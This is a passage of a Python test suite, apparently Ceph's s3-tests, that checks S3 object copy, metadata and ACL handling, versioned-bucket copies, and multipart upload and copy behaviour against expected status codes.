status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='object')
@attr(method='put')
@attr(operation='modify object metadata by copying')
@attr(assertion='fails')
def test_object_copy_to_itself_with_metadata():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
metadata = {'foo': 'bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='foo123bar', Metadata=metadata, MetadataDirective='REPLACE')
response = client.get_object(Bucket=bucket_name, Key='foo123bar')
eq(response['Metadata'], metadata)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object from different bucket')
@attr(assertion='works')
def test_object_copy_diff_bucket():
bucket_name1 = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name1, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name1, 'Key': 'foo123bar'}
client.copy(copy_source, bucket_name2, 'bar321foo')
response = client.get_object(Bucket=bucket_name2, Key='bar321foo')
body = _get_body(response)
eq('foo', body)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy to an inaccessible bucket')
@attr(assertion='fails w/AttributeError')
def test_object_copy_not_owned_bucket():
client = get_client()
alt_client = get_alt_client()
bucket_name1 = get_new_bucket_name()
bucket_name2 = get_new_bucket_name()
client.create_bucket(Bucket=bucket_name1)
alt_client.create_bucket(Bucket=bucket_name2)
client.put_object(Bucket=bucket_name1, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name1, 'Key': 'foo123bar'}
e = assert_raises(ClientError, alt_client.copy, copy_source, bucket_name2, 'bar321foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy a non-owned object in a non-owned bucket, but with perms')
@attr(assertion='works')
def test_object_copy_not_owned_object_bucket():
client = get_client()
alt_client = get_alt_client()
bucket_name = get_new_bucket_name()
client.create_bucket(Bucket=bucket_name)
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
alt_user_id = get_alt_user_id()
grant = {'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}
grants = add_obj_user_grant(bucket_name, 'foo123bar', grant)
client.put_object_acl(Bucket=bucket_name, Key='foo123bar', AccessControlPolicy=grants)
grant = add_bucket_user_grant(bucket_name, grant)
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=grant)
alt_client.get_object(Bucket=bucket_name, Key='foo123bar')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
alt_client.copy(copy_source, bucket_name, 'bar321foo')
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object and change acl')
@attr(assertion='works')
def test_object_copy_canned_acl():
bucket_name = get_new_bucket()
client = get_client()
alt_client = get_alt_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='bar321foo', ACL='public-read')
# check ACL is applied by doing GET from another user
alt_client.get_object(Bucket=bucket_name, Key='bar321foo')
metadata={'abc': 'def'}
copy_source = {'Bucket': bucket_name, 'Key': 'bar321foo'}
client.copy_object(ACL='public-read', Bucket=bucket_name, CopySource=copy_source, Key='foo123bar', Metadata=metadata, MetadataDirective='REPLACE')
# check ACL is applied by doing GET from another user
alt_client.get_object(Bucket=bucket_name, Key='foo123bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object and retain metadata')
def test_object_copy_retaining_metadata():
for size in [3, 1024 * 1024]:
bucket_name = get_new_bucket()
client = get_client()
content_type = 'audio/ogg'
metadata = {'key1': 'value1', 'key2': 'value2'}
client.put_object(Bucket=bucket_name, Key='foo123bar', Metadata=metadata, ContentType=content_type, Body=bytearray(size))
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
eq(content_type, response['ContentType'])
eq(metadata, response['Metadata'])
body = _get_body(response)
eq(size, response['ContentLength'])
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object and replace metadata')
def test_object_copy_replacing_metadata():
for size in [3, 1024 * 1024]:
bucket_name = get_new_bucket()
client = get_client()
content_type = 'audio/ogg'
metadata = {'key1': 'value1', 'key2': 'value2'}
client.put_object(Bucket=bucket_name, Key='foo123bar', Metadata=metadata, ContentType=content_type, Body=bytearray(size))
metadata = {'key3': 'value3', 'key2': 'value2'}
content_type = 'audio/mpeg'
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='bar321foo', Metadata=metadata, MetadataDirective='REPLACE', ContentType=content_type)
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
eq(content_type, response['ContentType'])
eq(metadata, response['Metadata'])
eq(size, response['ContentLength'])
@attr(resource='object')
@attr(method='put')
@attr(operation='copy from non-existent bucket')
def test_object_copy_bucket_not_found():
bucket_name = get_new_bucket()
client = get_client()
copy_source = {'Bucket': bucket_name + "-fake", 'Key': 'foo123bar'}
e = assert_raises(ClientError, client.copy, copy_source, bucket_name, 'bar321foo')
status = _get_status(e.response)
eq(status, 404)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy from non-existent object')
def test_object_copy_key_not_found():
bucket_name = get_new_bucket()
client = get_client()
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
e = assert_raises(ClientError, client.copy, copy_source, bucket_name, 'bar321foo')
status = _get_status(e.response)
eq(status, 404)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object to/from versioned bucket')
@attr(assertion='works')
@attr('versioning')
def test_object_copy_versioned_bucket():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
size = 1*5
data = bytearray(size)
data_str = data.decode()
key1 = 'foo123bar'
client.put_object(Bucket=bucket_name, Key=key1, Body=data)
response = client.get_object(Bucket=bucket_name, Key=key1)
version_id = response['VersionId']
# copy object in the same bucket
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key2 = 'bar321foo'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key2)
response = client.get_object(Bucket=bucket_name, Key=key2)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# second copy
version_id2 = response['VersionId']
copy_source = {'Bucket': bucket_name, 'Key': key2, 'VersionId': version_id2}
key3 = 'bar321foo2'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key3)
response = client.get_object(Bucket=bucket_name, Key=key3)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# copy to another versioned bucket
bucket_name2 = get_new_bucket()
check_configure_versioning_retry(bucket_name2, "Enabled", "Enabled")
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key4 = 'bar321foo3'
client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key=key4)
response = client.get_object(Bucket=bucket_name2, Key=key4)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# copy to another non versioned bucket
bucket_name3 = get_new_bucket()
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key5 = 'bar321foo4'
client.copy_object(Bucket=bucket_name3, CopySource=copy_source, Key=key5)
response = client.get_object(Bucket=bucket_name3, Key=key5)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# copy from a non versioned bucket
copy_source = {'Bucket': bucket_name3, 'Key': key5}
key6 = 'foo123bar2'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key6)
response = client.get_object(Bucket=bucket_name, Key=key6)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object to/from versioned bucket with url-encoded name')
@attr(assertion='works')
@attr('versioning')
def test_object_copy_versioned_url_encoding():
bucket = get_new_bucket_resource()
check_configure_versioning_retry(bucket.name, "Enabled", "Enabled")
src_key = 'foo?bar'
src = bucket.put_object(Key=src_key)
src.load() # HEAD request tests that the key exists
# copy object in the same bucket
dst_key = 'bar&foo'
dst = bucket.Object(dst_key)
dst.copy_from(CopySource={'Bucket': src.bucket_name, 'Key': src.key, 'VersionId': src.version_id})
dst.load() # HEAD request tests that the key exists
def generate_random(size, part_size=5*1024*1024):
"""
Generate the specified number random data.
(actually each MB is a repetition of the first KB)
"""
chunk = 1024
allowed = string.ascii_letters
for x in range(0, size, part_size):
strpart = ''.join([allowed[random.randint(0, len(allowed) - 1)] for _ in range(chunk)])
s = ''
left = size - x
this_part_size = min(left, part_size)
for y in range(this_part_size // chunk):
s = s + strpart
if this_part_size > len(s):
s = s + strpart[0:this_part_size - len(s)]
yield s
if (x == size):
return
def _multipart_upload(bucket_name, key, size, part_size=5*1024*1024, client=None, content_type=None, metadata=None, resend_parts=[]):
"""
generate a multi-part upload for a random file of specifed size,
if requested, generate a list of the parts
return the upload descriptor
"""
if client == None:
client = get_client()
if content_type == None and metadata == None:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
else:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key, Metadata=metadata, ContentType=content_type)
upload_id = response['UploadId']
s = ''
parts = []
for i, part in enumerate(generate_random(size, part_size)):
# part_num is necessary because PartNumber for upload_part and in parts must start at 1 and i starts at 0
part_num = i+1
s += part
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num})
if i in resend_parts:
client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
return (upload_id, s, parts)
@attr(resource='object')
@attr(method='put')
@attr(operation='test copy object of a multipart upload')
@attr(assertion='successful')
@attr('versioning')
def test_object_copy_versioning_multipart_upload():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key1 = "srcmultipart"
key1_metadata = {'foo': 'bar'}
content_type = 'text/bla'
objlen = 30 * 1024 * 1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key1, size=objlen, content_type=content_type, metadata=key1_metadata)
client.complete_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key1)
key1_size = response['ContentLength']
version_id = response['VersionId']
# copy object in the same bucket
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key2 = 'dstmultipart'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key2)
response = client.get_object(Bucket=bucket_name, Key=key2)
version_id2 = response['VersionId']
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# second copy
copy_source = {'Bucket': bucket_name, 'Key': key2, 'VersionId': version_id2}
key3 = 'dstmultipart2'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key3)
response = client.get_object(Bucket=bucket_name, Key=key3)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# copy to another versioned bucket
bucket_name2 = get_new_bucket()
check_configure_versioning_retry(bucket_name2, "Enabled", "Enabled")
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key4 = 'dstmultipart3'
client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key=key4)
response = client.get_object(Bucket=bucket_name2, Key=key4)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# copy to another non versioned bucket
bucket_name3 = get_new_bucket()
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key5 = 'dstmultipart4'
client.copy_object(Bucket=bucket_name3, CopySource=copy_source, Key=key5)
response = client.get_object(Bucket=bucket_name3, Key=key5)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# copy from a non versioned bucket
copy_source = {'Bucket': bucket_name3, 'Key': key5}
key6 = 'dstmultipart5'
client.copy_object(Bucket=bucket_name3, CopySource=copy_source, Key=key6)
response = client.get_object(Bucket=bucket_name3, Key=key6)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart upload without parts')
def test_multipart_upload_empty():
bucket_name = get_new_bucket()
client = get_client()
key1 = "mymultipart"
objlen = 0
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key1, size=objlen)
e = assert_raises(ClientError, client.complete_multipart_upload,Bucket=bucket_name, Key=key1, UploadId=upload_id)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart uploads with single small part')
def test_multipart_upload_small():
bucket_name = get_new_bucket()
client = get_client()
key1 = "mymultipart"
objlen = 1
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key1, size=objlen)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key1)
eq(response['ContentLength'], objlen)
# check extra client.complete_multipart_upload
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload_id, MultipartUpload={'Parts': parts})
def _create_key_with_random_content(keyname, size=7*1024*1024, bucket_name=None, client=None):
if bucket_name is None:
bucket_name = get_new_bucket()
if client == None:
client = get_client()
data_str = str(next(generate_random(size, size)))
data = bytes(data_str, 'utf-8')
client.put_object(Bucket=bucket_name, Key=keyname, Body=data)
return bucket_name
def _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size, client=None, part_size=5*1024*1024, version_id=None):
if(client == None):
client = get_client()
response = client.create_multipart_upload(Bucket=dest_bucket_name, Key=dest_key)
upload_id = response['UploadId']
if(version_id == None):
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
else:
copy_source = {'Bucket': src_bucket_name, 'Key': src_key, 'VersionId': version_id}
parts = []
i = 0
for start_offset in range(0, size, part_size):
end_offset = min(start_offset + part_size - 1, size - 1)
part_num = i+1
copy_source_range = 'bytes={start}-{end}'.format(start=start_offset, end=end_offset)
response = client.upload_part_copy(Bucket=dest_bucket_name, Key=dest_key, CopySource=copy_source, PartNumber=part_num, UploadId=upload_id, CopySourceRange=copy_source_range)
parts.append({'ETag': response['CopyPartResult']['ETag'], 'PartNumber': part_num})
i = i+1
return (upload_id, parts)
def _check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name, version_id=None):
client = get_client()
if(version_id == None):
response = client.get_object(Bucket=src_bucket_name, Key=src_key)
else:
response = client.get_object(Bucket=src_bucket_name, Key=src_key, VersionId=version_id)
src_size = response['ContentLength']
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
dest_size = response['ContentLength']
dest_data = _get_body(response)
assert(src_size >= dest_size)
r = 'bytes={s}-{e}'.format(s=0, e=dest_size-1)
if(version_id == None):
response = client.get_object(Bucket=src_bucket_name, Key=src_key, Range=r)
else:
response = client.get_object(Bucket=src_bucket_name, Key=src_key, Range=r, VersionId=version_id)
src_data = _get_body(response)
eq(src_data, dest_data)
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies with single small part')
def test_multipart_copy_small():
src_key = 'foo'
src_bucket_name = _create_key_with_random_content(src_key)
dest_bucket_name = get_new_bucket()
dest_key = "mymultipart"
size = 1
client = get_client()
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(size, response['ContentLength'])
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies with an invalid range')
def test_multipart_copy_invalid_range():
client = get_client()
src_key = 'source'
src_bucket_name = _create_key_with_random_content(src_key, size=5)
response = client.create_multipart_upload(Bucket=src_bucket_name, Key='dest')
upload_id = response['UploadId']
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
copy_source_range = 'bytes={start}-{end}'.format(start=0, end=21)
e = assert_raises(ClientError, client.upload_part_copy,Bucket=src_bucket_name, Key='dest', UploadId=upload_id, CopySource=copy_source, CopySourceRange=copy_source_range, PartNumber=1)
status, error_code = _get_status_and_error_code(e.response)
valid_status = [400, 416]
if not status in valid_status:
raise AssertionError("Invalid response " + str(status))
eq(error_code, 'InvalidRange')
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copy with an improperly formatted range')
# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/40795 is resolved
@attr('fails_on_rgw')
def test_multipart_copy_improper_range():
client = get_client()
src_key = 'source'
src_bucket_name = _create_key_with_random_content(src_key, size=5)
response = client.create_multipart_upload(
Bucket=src_bucket_name, Key='dest')
upload_id = response['UploadId']
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
test_ranges = ['{start}-{end}'.format(start=0, end=2),
'bytes={start}'.format(start=0),
'bytes=hello-world',
'bytes=0-bar',
'bytes=hello-',
'bytes=0-2,3-5']
for test_range in test_ranges:
e = assert_raises(ClientError, client.upload_part_copy,
Bucket=src_bucket_name, Key='dest',
UploadId=upload_id,
CopySource=copy_source,
CopySourceRange=test_range,
PartNumber=1)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies without x-amz-copy-source-range')
def test_multipart_copy_without_range():
client = get_client()
src_key = 'source'
src_bucket_name = _create_key_with_random_content(src_key, size=10)
dest_bucket_name = get_new_bucket_name()
get_new_bucket(name=dest_bucket_name)
dest_key = "mymultipartcopy"
response = client.create_multipart_upload(Bucket=dest_bucket_name, Key=dest_key)
upload_id = response['UploadId']
parts = []
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
part_num = 1
copy_source_range = 'bytes={start}-{end}'.format(start=0, end=9)
response = client.upload_part_copy(Bucket=dest_bucket_name, Key=dest_key, CopySource=copy_source, PartNumber=part_num, UploadId=upload_id)
parts.append({'ETag': response['CopyPartResult']['ETag'], 'PartNumber': part_num})
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(response['ContentLength'], 10)
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies with single small part')
def test_multipart_copy_special_names():
src_bucket_name = get_new_bucket()
dest_bucket_name = get_new_bucket()
dest_key = "mymultipart"
size = 1
client = get_client()
for src_key in (' ', '_', '__', '?versionId'):
_create_key_with_random_content(src_key, bucket_name=src_bucket_name)
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
response = client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(size, response['ContentLength'])
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
def _check_content_using_range(key, bucket_name, data, step):
client = get_client()
response = client.get_object(Bucket=bucket_name, Key=key)
size = response['ContentLength']
for ofs in range(0, size, step):
toread = size - ofs
if toread > step:
toread = step
end = ofs + toread - 1
r = 'bytes={s}-{e}'.format(s=ofs, e=end)
response = client.get_object(Bucket=bucket_name, Key=key, Range=r)
eq(response['ContentLength'], toread)
body = _get_body(response)
eq(body, data[ofs:end+1])
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload')
@attr(assertion='successful')
@attr('fails_on_aws')
def test_multipart_upload():
bucket_name = get_new_bucket()
key="mymultipart"
content_type='text/bla'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
client = get_client()
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, content_type=content_type, metadata=metadata)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
# check extra client.complete_multipart_upload
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
eq(rgw_bytes_used, objlen)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ContentType'], content_type)
eq(response['Metadata'], metadata)
body = _get_body(response)
eq(len(body), response['ContentLength'])
eq(body, data)
_check_content_using_range(key, bucket_name, data, 1000000)
_check_content_using_range(key, bucket_name, data, 10000000)
def check_versioning(bucket_name, status):
client = get_client()
try:
response = client.get_bucket_versioning(Bucket=bucket_name)
eq(response['Status'], status)
except KeyError:
eq(status, None)
# amazon is eventual consistent, retry a bit if failed
def check_configure_versioning_retry(bucket_name, status, expected_string):
client = get_client()
client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'Status': status})
read_status = None
for i in range(5):
try:
response = client.get_bucket_versioning(Bucket=bucket_name)
read_status = response['Status']
except KeyError:
read_status = None
if (expected_string == read_status):
break
time.sleep(1)
eq(expected_string, read_status)
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies of versioned objects')
@attr('versioning')
def test_multipart_copy_versioned():
src_bucket_name = get_new_bucket()
dest_bucket_name = get_new_bucket()
dest_key = "mymultipart"
check_versioning(src_bucket_name, None)
src_key = 'foo'
check_configure_versioning_retry(src_bucket_name, "Enabled", "Enabled")
size = 15 * 1024 * 1024
_create_key_with_random_content(src_key, size=size, bucket_name=src_bucket_name)
_create_key_with_random_content(src_key, size=size, bucket_name=src_bucket_name)
_create_key_with_random_content(src_key, size=size, bucket_name=src_bucket_name)
version_id = []
client = get_client()
response = client.list_object_versions(Bucket=src_bucket_name)
for ver in response['Versions']:
version_id.append(ver['VersionId'])
for vid in version_id:
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size, version_id=vid)
response = client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(size, response['ContentLength'])
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name, version_id=vid)
def _check_upload_multipart_resend(bucket_name, key, objlen, resend_parts):
content_type = 'text/bla'
metadata = {'foo': 'bar'}
client = get_client()
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, content_type=content_type, metadata=metadata, resend_parts=resend_parts)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ContentType'], content_type)
eq(response['Metadata'], metadata)
body = _get_body(response)
eq(len(body), response['ContentLength'])
eq(body, data)
_check_content_using_range(key, bucket_name, data, 1000000)
_check_content_using_range(key, bucket_name, data, 10000000)
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multiple multi-part upload with different sizes')
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload')
@attr(assertion='successful')
def test_multipart_upload_resend_part():
bucket_name = get_new_bucket()
key="mymultipart"
objlen = 30 * 1024 * 1024
_check_upload_multipart_resend(bucket_name, key, objlen, [0])
_check_upload_multipart_resend(bucket_name, key, objlen, [1])
_check_upload_multipart_resend(bucket_name, key, objlen, [2])
_check_upload_multipart_resend(bucket_name, key, objlen, [1,2])
_check_upload_multipart_resend(bucket_name, key, objlen, [0,1,2,3,4,5])
@attr(assertion='successful')
def test_multipart_upload_multiple_sizes():
bucket_name = get_new_bucket()
key="mymultipart"
client = get_client()
objlen = 5*1024*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 5*1024*1024+100*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 5*1024*1024+600*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 10*1024*1024+100*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 10*1024*1024+600*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 10*1024*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
@attr(assertion='successful')
def test_multipart_copy_multiple_sizes():
src_key = 'foo'
src_bucket_name = _create_key_with_random_content(src_key, 12*1024*1024)
dest_bucket_name = get_new_bucket()
dest_key="mymultipart"
client = get_client()
size = 5*1024*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 5*1024*1024+100*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 5*1024*1024+600*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 10*1024*1024+100*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 10*1024*1024+600*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 10*1024*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
@attr(resource='object')
@attr(method='put')
@attr(operation='check failure on multiple multi-part upload with size too small')
@attr(assertion='fails 400')
def test_multipart_upload_size_too_small():
bucket_name = get_new_bucket()
key="mymultipart"
client = get_client()
size = 100*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=size, part_size=10*1024)
e = assert_raises(ClientError, client.complete_multipart_upload, Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'EntityTooSmall')
def gen_rand_string(size, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def _do_test_multipart_upload_contents(bucket_name, key, num_parts):
payload=gen_rand_string(5)*1024*1024
client = get_client()
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
for part_num in range(0, num_parts):
part = bytes(payload, 'utf-8')
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num+1, Body=part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num+1})
last_payload = '123'*1024*1024
last_part = bytes(last_payload, 'utf-8')
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=num_parts+1, Body=last_part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': num_parts+1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key)
test_string = _get_body(response)
all_payload = payload*num_parts + last_payload
assert test_string == all_payload
return all_payload
@attr(resource='object')
@attr(method='put')
@attr(operation='check contents of multi-part upload')
@attr(assertion='successful')
def test_multipart_upload_contents():
bucket_name = get_new_bucket()
